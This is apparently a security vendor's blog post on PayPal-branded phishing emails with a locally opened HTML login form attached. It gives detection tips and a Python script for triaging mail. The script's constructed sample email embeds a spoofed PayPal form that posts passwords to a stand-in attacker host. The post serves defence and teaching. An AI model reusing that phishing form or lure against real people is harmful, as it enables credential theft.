Phishing scams are fraudulent email messages that appear to come from legitimate enterprises such as your university, your Internet service provider, or your bank. These messages usually direct you to a spoofed website, have a malicious attachment, or otherwise get you to divulge private information. The perpetrators then use this information to commit identity theft.
Why is PayPal fraud so special?
According to OpenPhish, a zero-day phishing site feed (https://openphish.com/phishing_activity.html), PayPal is one of the top 10 targeted brands. PayPal is very popular and holds sensitive user and payment information, which makes it a very attractive target for phishing attacks and credential theft by hackers and scammers.
[OpenPhish.com Top 10 targeted brands, 22.8.2016]
This PayPal site educates customers on how to recognize scams and deal with suspicious activity.
[Official PayPal’s suspicious activity tips site]
PayPal shares some helpful tips on how to spot a fake email:
[Some helpful tips on how to spot a fake email]
A real email from PayPal never includes attachments. If you receive an email that claims to come from PayPal and includes an attachment, an attack is underway and the file is definitely malicious.
Recently, a Check Point customer received a significant number of “PayPal” emails that contained an attachment. Here is an example:
[Original email sent to a Check Point customer]
The attached file (SHA1 b74e320aaeee9de20d74251d6ad0fbf9c9c7f2df) is an HTML form that is opened locally from the victim's disk.
[Html form b74e320aaeee9de20d74251d6ad0fbf9c9c7f2df]
Because the form is opened from the local disk rather than served from a web page, browser plugins and IDS systems that inspect web traffic never get a chance to block it. Running the sample in Threat Emulation quickly reveals that this is a phishing attempt to steal credentials: when the form is submitted, the traffic is sent to the attacker's site.
[The traffic is directed to the attacker’s site.]
The attacker uses the original PayPal icon and pictures taken from the PayPal Logo Center:
Despite the obvious similarity between all samples, the attacker sent the emails from several different IP addresses and countries:
[Source sender Geo distribution]
Emails like these are a sign that you are being targeted. Protect yourself with these rules:
- Never open an attachment unless you are absolutely sure it’s legitimate.
- Always check the name of the sender and attachment.
- Before you enter your credentials, make sure the site uses HTTPS. Most phishing attempts use plain HTTP.
- Never enter or share your credentials unless you are certain the form and site are legitimate.
- Take extra care when you receive email that contains “buzz words” such as “prize” and “urgent”, or typos such as “flnd” instead of “find.”
- Remember this post’s motto: “PayPal Will Never Send You an Attachment”!
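The rules above, together with the analysis of the HTML attachment earlier in this post, can be turned into a simple mail-triage check. The following script is an added example written for this post, not Check Point's or PayPal's code. It parses a raw email, flags a PayPal-branded message that carries an attachment (the post's motto), a display name that claims PayPal while the address domain does not match, lure words or the “flnd” typo in the subject, an attachment whose SHA1 matches the hash from this post, and any HTML attachment whose password form posts to a non-PayPal host or over plain HTTP. The sample messages, the sender and collection hosts in them, and the `BRAND_DOMAINS` list are all constructed for the example.

```python
import email
import email.utils
import hashlib
from email import policy
from html.parser import HTMLParser
from urllib.parse import urlparse

# Domains PayPal legitimately sends from and hosts login pages on (assumption for this example).
BRAND_DOMAINS = ("paypal.com",)
# SHA1 of the HTML form analysed in this post.
KNOWN_BAD_SHA1 = {"b74e320aaeee9de20d74251d6ad0fbf9c9c7f2df"}
# "Buzz words" and the typo the post calls out.
LURE_WORDS = ("urgent", "prize", "flnd")


def is_brand_domain(host):
    """True if host is one of BRAND_DOMAINS or a subdomain of one."""
    host = (host or "").lower()
    return any(host == d or host.endswith("." + d) for d in BRAND_DOMAINS)


class FormFinder(HTMLParser):
    """Record every <form> action and whether that form asks for a password."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action") or "", "has_password": False}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if (a.get("type") or "").lower() == "password":
                self._current["has_password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def analyze_html_form(html_text):
    """Findings for password forms that post away from PayPal or over plain HTTP."""
    parser = FormFinder()
    parser.feed(html_text)
    findings = []
    for form in parser.forms:
        if not form["has_password"]:
            continue
        url = urlparse(form["action"])
        if not is_brand_domain(url.hostname):
            findings.append("credential form posts to non-PayPal host %s"
                            % (url.hostname or "<relative action>"))
        if url.scheme == "http":
            findings.append("credential form posts over plain HTTP")
    return findings


def triage_message(raw_eml):
    """Return human-readable findings for one raw email; an empty list means nothing matched."""
    msg = email.message_from_string(raw_eml, policy=policy.default)
    findings = []

    display_name, address = email.utils.parseaddr(msg.get("From", ""))
    sender_domain = address.rsplit("@", 1)[-1].lower() if "@" in address else ""
    claims_brand = "paypal" in display_name.lower() or "paypal" in sender_domain
    if claims_brand and not is_brand_domain(sender_domain):
        findings.append("sender claims PayPal but address domain is %r" % sender_domain)

    subject = (msg.get("Subject") or "").lower()
    hits = [w for w in LURE_WORDS if w in subject]
    if hits:
        findings.append("subject contains lure words: %s" % ", ".join(hits))

    for part in msg.iter_attachments():
        name = part.get_filename() or "<unnamed>"
        if claims_brand:
            findings.append("PayPal-branded mail carries attachment %r (PayPal never sends attachments)" % name)
        digest = hashlib.sha1(part.get_payload(decode=True) or b"").hexdigest()
        if digest in KNOWN_BAD_SHA1:
            findings.append("attachment %r matches known phishing form SHA1 %s" % (name, digest))
        if part.get_content_type() == "text/html":
            findings.extend(analyze_html_form(part.get_content()))
    return findings


# Constructed sample: a PayPal-branded lure with a locally opened HTML form attached.
SAMPLE_EML = """\
From: "PayPal Service" <service@mail-notify.example>
To: victim@example.org
Subject: Your account has been limited - please flnd the attached form
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain; charset="utf-8"

Please open the attached form to restore access.

--b1
Content-Type: text/html; charset="utf-8"
Content-Disposition: attachment; filename="PayPal_Form.html"

<html><body><form method="post" action="http://collect.attacker.invalid/login.php">
<input name="email"><input type="password" name="passwd"><input type="submit" value="Log In">
</form></body></html>
--b1--
"""

# Constructed sample: a plain receipt with no attachment from the brand's own domain.
BENIGN_EML = """\
From: "PayPal" <service@paypal.com>
To: victim@example.org
Subject: Receipt for your payment
Content-Type: text/plain; charset="utf-8"

Thanks for your payment.
"""
```

Feed `triage_message()` the text of an `.eml` file at a mail gateway or in an analyst's triage tool; the constructed `SAMPLE_EML` produces five findings (spoofed display name, the “flnd” lure, an attachment on PayPal-branded mail, a credential form posting to a non-PayPal host, and plain HTTP), while `BENIGN_EML` produces none. The form check reads only the HTML's `action` attribute, so it works on the file at rest without opening it in a browser, which is the point of this delivery method.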
Check Point Protections
The Check Point IPS blade provides protection against this threat with these IPS protections:
- PayPal Mail Phishing Containing Attachment
- Phishing URL Attack Attempt